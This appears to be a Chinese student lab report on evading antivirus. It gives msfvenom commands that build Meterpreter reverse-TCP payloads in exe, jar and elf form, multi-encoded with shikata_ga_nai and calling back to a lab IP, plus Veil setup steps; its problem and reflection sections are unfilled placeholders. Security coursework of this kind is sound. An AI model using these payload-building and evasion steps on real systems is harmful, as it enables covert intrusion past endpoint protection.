1.实验内容
- 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
- 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
- veil,加壳工具
- 使用C + shellcode编程
- 通过组合应用各种技术实现恶意代码免杀
如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。 - 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
2.实验过程
2.1 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
2.1.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
查看 msfvenom 支持的所有输出格式:输入msfvenom --list formats
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh.exe,生成payload
-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型,是一个 Meterpreter 反向 TCP 连接
LHOST=192.168.136.132 设置了连接回的本地 IP 地址,即kali虚拟机的 IP 地址
LPORT=2410 设置了连接回的本地端口号,这里为学号后四位
-f exe: 这指定了输出格式为 Windows 可执行文件
查看 msfvenom 支持的所有编码方式:输入msfvenom --list encoders
使用编码器对payload进行编码,输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh-2.exe
-e x86/shikata_ga_nai: 这指定了要使用的编码器;
-b ‘\x00’: 这指定了需要避免的坏字符集;
LHOST、LPORT同上;
多次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh-3.exe
-i 10表示编码10次
选择一个适用于Java环境的payload来生成jar文件:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f jar > 20222410yh-4.jar
使用编码器对payload进行编码:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -e x86/shikata_ga_nai -i 10 -f jar > 20222410yh-5.jar
生成一个反向 TCP 连接的 Linux elf 可执行文件:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f elf > 20222410yh-6.elf
使用编码器对payload进行编码:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -e x86/shikata_ga_nai -i 10 -f elf > 20222410yh-7.elf
将生成的20222410yh.exe等多个文件放到共享文件夹中传到主机上
20222410yh.exe:
20222410yh-2.exe:
20222410yh-3.exe:
20222410yh-5.jar:
20222410yh-7.elf:
2.1.2 使用veil工具
安装veil,需要保持虚拟机是联网状态,依次输入以下命令:
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32
当输入完sudo apt-get install wine32后报错,此时先输入dpkg --add-architecture i386,再输入sudo apt-get update,然后输入sudo apt-get install wine32即可
3.问题及解决方案
- 问题1:XXXXXX
- 问题1解决方案:XXXXXX
- 问题2:XXXXXX
- 问题2解决方案:XXXXXX - ...
4.学习感悟、思考等
xxx xxx
标签:LPORT,exe,x86,LHOST,2024,2025,20222410,msfvenom,20222410yh From: https://www.cnblogs.com/Lelouch123/p/18473981